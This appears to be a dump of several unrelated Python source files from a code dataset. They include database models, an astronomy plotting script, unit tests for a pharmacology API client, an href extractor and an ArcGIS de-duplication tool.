    from_user = db.relationship('User', foreign_keys=[from_id])
    to_user = db.relationship('User', foreign_keys=[to_id])

    def __init__(self, from_id=None, to_id=None):
        self.from_id = from_id
        self.to_id = to_id
        # New connections always start as first-degree links.
        self.degree = 1

    def __repr__(self):
        return '<Connection(from=%s, to=%s, degree=%s)>' % (
            self.from_user, self.to_user, self.degree)
class AccessRequest(db.Model):
    """A pending request by a user (or group) for access rights to a dataset."""

    __tablename__ = 'access_requests'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    # Requested permissions; all default to "not requested".
    can_read = db.Column(db.Boolean, default=False)
    can_interact = db.Column(db.Boolean, default=False)
    can_fork = db.Column(db.Boolean, default=False)
    # Free-text message accompanying the request.
    message = db.Column(db.String)
    created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
    user = db.relationship('User')
    usergroup = db.relationship('Group')
    dataset = db.relationship('Dataset')

    def __repr__(self):
        # Fixed: the format string was missing the closing ')' before '>',
        # unlike every other model's repr in this file.
        return '<AccessRequest(user={}, dataset={}, read={}, interact={}, fork={})>'.\
            format(self.user, self.dataset, self.can_read, self.can_interact, self.can_fork)
class DirectAccess(db.Model):
    """Access rights granted directly to a user (or group) on a dataset."""

    __tablename__ = 'direct_access'
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
    dataset_id = db.Column(db.Integer, db.ForeignKey('datasets.id'))
    # Granted permissions; all default to "not granted".
    can_read = db.Column(db.Boolean, default=False)
    can_interact = db.Column(db.Boolean, default=False)
    can_fork = db.Column(db.Boolean, default=False)
    user = db.relationship('User')
    usergroup = db.relationship('Group')
    dataset = db.relationship('Dataset')

    def __repr__(self):
        # Fixed: the original passed the builtin `object` as the second format
        # argument, so `dataset=` printed the `object` class, `read=` printed
        # the dataset, and `self.can_read` was never shown at all; it also
        # lacked the closing ')' before '>'.
        return '<DirectAccess(user={}, dataset={}, read={}, interact={}, fork={})>'.\
            format(self.user, self.dataset, self.can_read, self.can_interact, self.can_fork)
|
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import sys

# Plot the per-quadrant light curve of a single (noisy) detector pixel from
# an event-list FITS file.
#
# Usage: script.py <event_file> <detx> <dety>
# The obsid/orbit number are parsed from the '_'-separated file name
# (fields 2 and 3) -- assumes the upstream naming convention; TODO confirm.
evtorg = sys.argv[1]
org = fits.open(evtorg)
obsid = evtorg.split('_')[2]
orbitno = evtorg.split('_')[3].split('c')[0]
noisy_detx = int(sys.argv[2])
noisy_dety = int(sys.argv[3])

fig = plt.figure()
# Quadrant event lists live in HDUs 1-4.
for qid in range(1, 5):
    pixdata = org[qid].data['Time'][np.where((org[qid].data['DETX'] == noisy_detx) & (org[qid].data['DETY'] == noisy_dety))]
    print(pixdata)  # fixed: was a Python 2 `print pixdata` statement
    if pixdata.size == 0:
        # No events for this pixel in this quadrant; the histogram call
        # below would crash indexing pixdata[-1].
        continue
    # One bin per second of elapsed time (Time is monotonic per quadrant).
    oh, b1 = np.histogram(pixdata, bins=int(pixdata[-1] - pixdata[0]))
    plt.plot(b1[:-1], oh)
    plt.show()
    # fig.savefig(obsid + "_" + orbitno + "_Q" + str(qid) + ".png")
org.close()
|
import time
import math
import pytest
import pleasehold
def test_duration():
    """Holding for `duration` seconds should take roughly that long overall."""
    duration = 5
    started = time.time()
    with pleasehold.hold():
        time.sleep(duration)
    elapsed = time.time() - started
    # Allow 1% relative slack for scheduler jitter.
    assert math.isclose(elapsed, duration, rel_tol=0.01)
|
from flask import Flask, render_template
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_mysqldb import MySQL
#from flask_migrate import Migrate
from flask_babel import Babel, lazy_gettext as _l
import json
import pandas as pd
import numpy as np
import os, base64, re, logging

# Flask application object, configured from the project's Config class.
AppServer = Flask(__name__)
AppServer.config.from_object(Config)

# Shared SQLAlchemy handle used by the models and route modules.
db = SQLAlchemy(AppServer)

# i18n support (translations resolved per-request by Flask-Babel).
babel = Babel()
babel.init_app(AppServer)
#migrate = Migrate(AppServer, db)

# Imported last, purely for its side effects: `routes` registers the view
# functions on AppServer and therefore needs AppServer/db to exist first.
import routes
|
# This file is used for generating label files in experiments with Caffe.
import os

# Module-level scratch list of discovered image file names.
images = []
def maketrainList(imageFile, pathFile):
    """Append '<filename> <label>' lines to *pathFile* for images under *imageFile*.

    The label is the second '_'-separated token of each file's base name
    (e.g. 'img_3.png' -> '3'), matching the Caffe image-list format.

    :param imageFile: directory tree to walk for image files
    :param pathFile: label file to append to (opened in 'a' mode)
    """
    # Collect names into a local list. The original accumulated into the
    # module-level `images` list, which duplicated every entry when the
    # function was called more than once per process.
    names = []
    for root, dirs, files in os.walk(imageFile):
        files.sort()
        for f in files:
            names.append(f)
    # `with` guarantees the handle is closed even if a name lacks a '_' part.
    with open(pathFile, 'a') as fobj:
        for name in names:
            base = os.path.basename(name)
            base1 = os.path.splitext(base)[0]
            label = base1.split('_')[1]
            print(label)  # fixed: was a Python 2 `print label` statement
            fobj.write(name + ' ' + label + '\n')
            print(name + ' ' + label + ' writes to the file successfully ')
# Generate labels for the 40-image grey-scale test split; the training
# variant is kept below, commented out, for reference.
maketrainList('bvlc_googlenet/ma_aug/testingData40', 'data/grey_scale_dataset/testLabel_40.txt')
#maketrainList('bvlc_googlenet/ma_aug/trainingData60', 'data/grey_scale_dataset/trainLabel_60.txt')
|
from unittest import TestCase
import unittest.mock
from unittest.mock import patch
from pygtop.interactions import Interaction, get_all_interactions
from pygtop.ligands import Ligand
from pygtop.targets import Target
import pygtop.exceptions as exceptions
import xml.etree.ElementTree as ElementTree
class InteractionTest(TestCase):
    """Shared fixtures for the interaction tests below.

    Each attribute is a canned JSON payload of the shape returned by the
    Guide to PHARMACOLOGY (GtoP) web service, so the concrete test classes
    can feed them to mocked retrievers.
    """

    def setUp(self):
        # A single ligand-target interaction record (ligand 7191 -> target 1).
        self.interaction_json = {
            "interactionId": 79397,
            "targetId": 1,
            "ligandAsTargetId": 0,
            "targetSpecies": "Human",
            "primaryTarget": False,
            "targetBindingSite": "",
            "ligandId": 7191,
            "ligandContext": "",
            "endogenous": False,
            "type": "Agonist",
            "action": "Agonist",
            "actionComment": "",
            "selectivity": "None",
            "concentrationRange": "-",
            "affinity": "7.2",
            "affinityType": "pKi",
            "originalAffinity": "6x10<sup>-8</sup>",
            "originalAffinityType": "Ki",
            "originalAffinityRelation": "",
            "assayDescription": "",
            "assayConditions": "",
            "useDependent": False,
            "voltageDependent": False,
            "voltage": "-",
            "physiologicalVoltage": False,
            "conciseView": False,
            "dataPoints": [],
            "refs": []
        }

        # A ligand record (id 1, flesinoxan).
        self.ligand_json = {
            "ligandId": 1,
            "name": "flesinoxan",
            "abbreviation": "flexo",
            "inn": "flesinoxan",
            "type": "Synthetic organic",
            "species": None,
            "radioactive": False,
            "labelled": True,
            "approved": True,
            "withdrawn": False,
            "approvalSource": "FDA (1997)",
            "subunitIds": [2, 3],
            "complexIds": [5],
            "prodrugIds": [7],
            "activeDrugIds": [9, 10]
        }

        # A target record (id 1, the 5-HT1A receptor).
        self.target_json = {
            "targetId": 1,
            "name": "5-HT<sub>1A</sub> receptor",
            "abbreviation": "5-HT",
            "systematicName": None,
            "type": "GPCR",
            "familyIds": [1],
            "subunitIds": [2, 3],
            "complexIds": [4]
        }

        # GtoP PDB mappings: two Human structures (ligands 121 and 149) plus
        # one Rat structure, so tests can exercise ligand/species filtering.
        self.pdb_json = [
            {
                "targetId" : 2,
                "ligandId" : 121,
                "endogenous" : False,
                "pdbCode" : "4IAQ",
                "description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with dihydroergotamine",
                "resolution" : 2.8,
                "species" : "Human",
                "refs" : []
            }, {
                "targetId" : 2,
                "ligandId" : 149,
                "endogenous" : False,
                "pdbCode" : "4IAR",
                "description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with ergotamine",
                "resolution" : 2.7,
                "species" : "Human",
                "refs" : []
            }, {
                "targetId" : 2,
                "ligandId" : 149,
                "endogenous" : False,
                "pdbCode" : "4xxx",
                "description" : "Crystal structure of the chimeric protein of 5-HT1B-BRIL in complex with ergotamine",
                "resolution" : 2.7,
                "species" : "Rat",
                "refs" : []
            }
        ]
class InteractionRetrievalTests(InteractionTest):
    """Tests for the module-level get_all_interactions() retriever."""

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_can_get_all_interactions(self, mock_json_retriever):
        # Two payloads from the (mocked) web service -> two Interaction objects.
        mock_json_retriever.return_value = [self.interaction_json, self.interaction_json]
        interactions = get_all_interactions()
        self.assertIsInstance(interactions, list)
        self.assertEqual(len(interactions), 2)
        self.assertIsInstance(interactions[0], Interaction)
        self.assertIsInstance(interactions[1], Interaction)
class InteractionCreationTests(InteractionTest):
    """Tests for Interaction.__init__'s parsing of the raw JSON payload."""

    def test_can_create_interaction(self):
        # Every field of interest should be copied out of the JSON verbatim;
        # the scalar "7.2" affinity becomes both the low and high bound.
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction.json_data, self.interaction_json)
        self.assertEqual(interaction._interaction_id, 79397)
        self.assertEqual(interaction._ligand_id, 7191)
        self.assertEqual(interaction._target_id, 1)
        self.assertEqual(interaction._species, "Human")
        self.assertEqual(interaction._primary_target, False)
        self.assertEqual(interaction._endogenous, False)
        self.assertEqual(interaction._interaction_type, "Agonist")
        self.assertEqual(interaction._action, "Agonist")
        self.assertEqual(interaction._affinity_low, 7.2)
        self.assertEqual(interaction._affinity_high, 7.2)
        self.assertEqual(interaction._affinity_type, "pKi")

    def test_can_process_affinity_range(self):
        # An en-dash separated "low – high" range splits into two bounds.
        self.interaction_json["affinity"] = "9.4 – 10.3"
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction._affinity_low, 9.4)
        self.assertEqual(interaction._affinity_high, 10.3)

    def test_can_process_affinity_range_with_median(self):
        # A trailing "(median: ...)" annotation must be ignored.
        self.interaction_json["affinity"] = "7.7 – 9.0 (median: 8.6)"
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction._affinity_low, 7.7)
        self.assertEqual(interaction._affinity_high, 9.0)

    def test_can_process_dash_affinity(self):
        # "-" means no affinity data: both bounds become None.
        self.interaction_json["affinity"] = "-"
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction._affinity_low, None)
        self.assertEqual(interaction._affinity_high, None)

    def test_interaction_repr(self):
        interaction = Interaction(self.interaction_json)
        self.assertEqual(str(interaction), "<Interaction (7191 --> Human 1)>")
class InteractionPropertyTests(InteractionTest):
    """Tests for Interaction's accessors and its ligand/target/PDB lookups.

    Note on @patch stacking: decorators apply bottom-up, so the bottom-most
    @patch corresponds to the first mock argument. The side_effect lists are
    consumed strictly in call order, so these tests pin the exact sequence of
    web-service requests the code under test makes.
    """

    def test_basic_property_methods(self):
        # Each accessor should return the underlying private attribute as-is.
        interaction = Interaction(self.interaction_json)
        self.assertIs(interaction._interaction_id, interaction.interaction_id())
        self.assertIs(interaction._ligand_id, interaction.ligand_id())
        self.assertIs(interaction._target_id, interaction.target_id())
        self.assertIs(interaction._species, interaction.species())
        self.assertIs(interaction._primary_target, interaction.primary_target())
        self.assertIs(interaction._endogenous, interaction.endogenous())
        self.assertIs(interaction._interaction_type, interaction.interaction_type())
        self.assertIs(interaction._action, interaction.action())
        self.assertIs(interaction._affinity_low, interaction.affinity_low())
        self.assertIs(interaction._affinity_high, interaction.affinity_high())
        self.assertIs(interaction._affinity_type, interaction.affinity_type())

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_can_get_ligand(self, mock_json_retriever):
        mock_json_retriever.return_value = self.ligand_json
        interaction = Interaction(self.interaction_json)
        ligand = interaction.ligand()
        self.assertIsInstance(ligand, Ligand)
        self.assertEqual(ligand.ligand_id(), self.ligand_json["ligandId"])

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_ligand_when_no_json(self, mock_json_retriever):
        # A failed web-service lookup should yield None, not raise.
        mock_json_retriever.return_value = None
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction.ligand(), None)

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_can_get_target(self, mock_json_retriever):
        mock_json_retriever.return_value = self.target_json
        interaction = Interaction(self.interaction_json)
        target = interaction.target()
        self.assertIsInstance(target, Target)
        self.assertEqual(target.target_id(), self.target_json["targetId"])

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_target_when_no_json(self, mock_json_retriever):
        mock_json_retriever.return_value = None
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction.target(), None)

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_can_get_gtop_pdbs(self, mock_json_retriever):
        # Only the Human PDB entry matching this interaction's ligand (149)
        # should be returned from the fixture's three mappings.
        mock_json_retriever.return_value = self.pdb_json
        self.interaction_json["ligandId"] = 149
        interaction = Interaction(self.interaction_json)
        pdbs = interaction.gtop_pdbs()
        self.assertEqual(pdbs, ["4IAR"])

    @patch("pygtop.gtop.get_json_from_gtop")
    def test_gtop_pdbs_when_no_json(self, mock_json_retriever):
        mock_json_retriever.return_value = None
        interaction = Interaction(self.interaction_json)
        self.assertEqual(interaction.gtop_pdbs(), [])

    @patch("pygtop.gtop.get_json_from_gtop")
    @patch("pygtop.pdb.query_rcsb")
    @patch("pygtop.pdb.query_rcsb_advanced")
    def test_can_get_all_external_pdbs(self, mock_xml_retriever, mock_simple_retriever, mock_json_retriever):
        # Canned RCSB SMILES-query response (two benzamide-bearing structures).
        mock_simple_retriever.return_value = ElementTree.fromstring('''<?xml version='1.0' standalone='no' ?>
<smilesQueryResult smiles="NC(=O)C1=CC=CC=C1" search_type="4">
<ligandInfo>
<ligand structureId="2XG3" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
<ligand structureId="3A1I" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
</ligandInfo>
</smilesQueryResult>''')
        # Four advanced-query result lists; "4IAR" is the only code common to
        # both the ligand-side and target-side searches.
        mock_xml_retriever.side_effect = [["1xxx", "3A1I"], ["4IAR"], ["2xxx"], ["4IAR", "3xxx"]]
        # JSON responses in the exact order the code requests them.
        mock_json_retriever.side_effect = [
            self.ligand_json, # Create ligand
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has smiles
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use smiles
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has inchi
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use inchi
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has peptide code
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use peptide code
            self.target_json, # Make target
            [{"accession": "10576", "database": "UniProtKB", "species": "Human", "url":"http"}]
        ]
        interaction = Interaction(self.interaction_json)
        pdbs = interaction.all_external_pdbs()
        self.assertEqual(pdbs, ["4IAR"])

    @patch("pygtop.gtop.get_json_from_gtop")
    @patch("pygtop.pdb.query_rcsb")
    @patch("pygtop.pdb.query_rcsb_advanced")
    def test_can_get_all_pdbs(self, mock_xml_retriever, mock_simple_retriever, mock_json_retriever):
        # Same canned RCSB response as above.
        mock_simple_retriever.return_value = ElementTree.fromstring('''<?xml version='1.0' standalone='no' ?>
<smilesQueryResult smiles="NC(=O)C1=CC=CC=C1" search_type="4">
<ligandInfo>
<ligand structureId="2XG3" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
<ligand structureId="3A1I" chemicalID="UNU" type="non-polymer" molecularWeight="121.137">
<chemicalName>BENZAMIDE</chemicalName>
<formula>C7 H7 N O</formula>
<InChIKey>KXDAEFPNCMNJSK-UHFFFAOYSA-N</InChIKey>
<InChI>InChI=1S/C7H7NO/c8-7(9)6-4-2-1-3-5-6/h1-5H,(H2,8,9)</InChI>
<smiles>c1ccc(cc1)C(=O)N</smiles>
</ligand>
</ligandInfo>
</smilesQueryResult>''')
        mock_xml_retriever.side_effect = [["1xxx", "3A1I"], ["4IAR"], ["2xxx"], ["3A1I", "3xxx"]]
        # This path also fetches the interaction list and GtoP PDB mappings,
        # so the combined result should merge GtoP and external codes.
        mock_json_retriever.side_effect = [
            self.ligand_json, # Create ligand
            [self.interaction_json],
            self.pdb_json,
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has smiles
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use smiles
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has inchi
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use inchi
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Check has peptide code
            {"smiles": "CCC", "inchi": "CCC", "oneLetterSeq": "CCC"}, # Use peptide code
            self.target_json, # Make target
            self.pdb_json,
            [{"accession": "10576", "database": "UniProtKB", "species": "Human", "url":"http"}]
        ]
        interaction = Interaction(self.interaction_json)
        pdbs = interaction.all_pdbs()
        self.assertEqual(len(pdbs), 2)
        for code in ["3A1I", "4IAR"]:
            self.assertIn(code, pdbs)
|
#!/usr/bin/python -O
import sys
from codecs import open
def extract(fname):
    """Print the file name, then every href target found in *fname*, one per line.

    Quoted values (href="...") are printed up to the closing quote; unquoted
    values are printed up to the first whitespace.
    """
    print(fname)
    try:
        f = open(fname)
    except OSError:
        # Was a bare `except:`, which also hid programming errors; only
        # I/O failures should be reported as "unable to open".
        print('Unable to open ' + fname)
        return
    # `with` guarantees the handle is closed even if parsing raises
    # (the original relied on an unconditional f.close() after the loop).
    with f:
        for line in f:
            for chunk in line.split('href=')[1:]:
                if not chunk:
                    # A line ending exactly in 'href=' yields an empty chunk;
                    # the original crashed on chunk[0] here.
                    continue
                if chunk[0] == '"':
                    target = chunk[1:].split('"', 1)[0]
                else:
                    target = chunk.split()[0]
                print(target)
def main(argv=None):
    """Run extract() on each file named on the command line.

    :param argv: argument vector to use (argv[0] is skipped, argparse-style);
        defaults to sys.argv. The original accepted this parameter but then
        ignored it and read sys.argv directly, making the function untestable.
    """
    if argv is None:
        argv = sys.argv
    for fname in argv[1:]:
        extract(fname)

if __name__ == "__main__": main()
|
## Author: Mitch Holley
## Date: 08/30/2016
## Version: 2.7.8
##
## This script is meant to be imported into an ArcGIS script. The purpose of the tool is to delete duplicate
## records in a specific field. A checkbox is included in the script to check for duplicate geometries.
## Both a specific field AND the duplicate geometry checkbox should not be selected at one time. This tool was
## built as a replacement for the 'Delete Identical (Data Management)' tool found in the ArcGIS Advanced License package.
##EDITS:
##9/12/2016 - After some testing, using sets was found to be much faster than lists. All old lists were convereted to sets().
import arcpy

# Feature class to de-duplicate (tool parameter 0).
feature = arcpy.GetParameterAsText(0)
# Field whose duplicate values should be removed (tool parameter 1).
field = arcpy.GetParameterAsText(1)
# Checkbox (tool parameter 2): 'true' means de-duplicate on geometry
# rather than on the chosen field.
ischecked = arcpy.GetParameterAsText(2)

# Seen-value sets: sets give O(1) membership tests (see the 9/12/2016 note
# in the header about switching from lists).
field_list = set()
shapes = set()

# Number of rows deleted, for the completion message.
count = 0

if str(ischecked) == 'true':
    # Geometry mode: keep the first row for each SHAPE@XY value, delete the
    # rest. NOTE(review): SHAPE@XY is a centroid-coordinate token, so
    # distinct shapes sharing a centroid would also be treated as
    # duplicates -- confirm this is acceptable for the intended data.
    with arcpy.da.UpdateCursor(feature, ['SHAPE@XY']) as cursor:
        for row in cursor:
            if row[0] not in shapes:
                shapes.add(row[0])
            else:
                count+=1
                cursor.deleteRow()
    arcpy.AddMessage('\n'+str(count) + ' duplicate geometries removed.\n')
else:
    # Field mode: keep the first row for each distinct field value.
    with arcpy.da.UpdateCursor(feature, [field]) as cursor:
        for row in cursor:
            if row[0] not in field_list:
                field_list.add(row[0])
            else:
                count+=1
                cursor.deleteRow()
    arcpy.AddMessage('\n'+str(count) + ' duplicates removed from the ' + str(field) + ' field.\n')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.